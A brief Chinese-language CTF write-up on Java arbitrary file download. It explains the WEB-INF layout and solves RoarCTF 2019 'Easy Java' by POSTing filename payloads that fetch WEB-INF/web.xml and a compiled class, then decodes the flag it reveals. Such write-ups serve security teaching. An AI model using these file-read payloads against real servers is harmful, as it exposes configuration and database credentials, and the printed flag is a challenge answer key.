java任意文件下载

---

WEB-INF中包含：

web.xml：整个web应用的配置信息
classes（类路径）：站点所有用的class文件，包括servlet class和非servlet class，他们不能包含在.jar文件中。
src：源码目录，按照包名结构放置各个java文件。
lib：存放web应用需要的各种jar文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件，会自动添加到buildpath。
database.properties：数据库配置文件

java任意文件下载漏洞利用方法：

下载/WEB-INF/web.xml文件，推断class文件路径，下载class文件，查看。

---

例题

[RoarCTF 2019]Easy Java 1

POST参数

filename=WEB-INF/web.xml

下载web.xml文件，查看发现：

<servlet-class>com.wm.ctf.FlagController</servlet-class>

POST参数

filename=WEB-INF/classes/com/wm/ctf/FlagController.class

下载文件。

发现base64编码字符串:

ZmxhZ3s2YTAxYjAxNC05MmVjLTRjNTUtYWQwOC1lZmEwYTMzM2ZmMjZ9Cg==

解得

flag{6a01b014-92ec-4c55-ad08-efa0a333ff26}

---

参考

https://mochu.blog.csdn.net/article/details/109572179?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control&dist_request_id=1331988.12589.16188306337339131&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control

https://www.cnblogs.com/Cl0ud/p/12177085.html